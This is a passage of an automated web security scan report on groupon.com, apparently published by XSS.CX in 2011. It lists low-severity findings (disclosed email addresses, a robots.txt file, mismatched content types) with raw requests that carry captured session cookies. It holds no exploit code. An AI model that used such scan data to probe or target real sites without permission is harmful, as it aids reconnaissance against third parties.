HTTP/1.1 200 OK-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/d92a28cd3b4e873e6252c1; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:25 GMT; HttpOnlyd1227d6a90fb1".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... affiliate@groupon.com ">...[SNIP]...
7.4. http://www.groupon.com/pages/api
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/api
Issue detail
The following email address was disclosed in the response:
Request
GET /pages/api HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKcaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/5f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:50 GMT; HttpOnly43f986276965a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... support@groupon.com ">support@groupon.com </a>...[SNIP]...
7.5. http://www.groupon.com/press
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/press
Issue detail
The following email address was disclosed in the response:
Request
GET /press HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.3.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/a55f4549b5b6391dde187c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:27 GMT; HttpOnlya39a885430d5a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... press@groupon.com " title="Email press at Groupon">press@groupon.com </a>...[SNIP]...
8. Robots.txt file
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.0 200 OK.amazonaws.com/sitemaps/sitemap_index.xml.gz...[SNIP]...
9. Content type incorrectly stated
previous
There are 2 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
9.1. http://www.groupon.com/blog/wp-content/themes/groublogpon/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.groupon.com
Path:
/blog/wp-content/themes/groublogpon/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /blog/wp-content/themes/groublogpon/favicon.ico HTTP/1.1;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKContent-Type: text/plain .EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EEE.EE...[SNIP]...
9.2. http://www.groupon.com/deals/cairo-hookah-lounge/deal_status.json
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.groupon.com
Path:
/deals/cairo-hookah-lounge/deal_status.json
Issue detail
The response contains the following Content-type statement:Content-Type: application/json; charset=utf-8 JSON . However, it actually appears to contain HTML .
Request
GET /deals/cairo-hookah-lounge/deal_status.json HTTP/1.1/dallas/;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; has_visited_now_deals=true; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.7.8.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8 60b1484af61c8""deal_min":59,"number_sold_container":"\n<table class='status'>\n <tr class=\"sum\"><td class=\"left\"><span class=\"number\">7</span></td><td class=\"right\"> bought</td></tr>\...[SNIP]...
Report generated by XSS.CX at Sat Aug 20 06:09:52 GMT-06:00 2011. 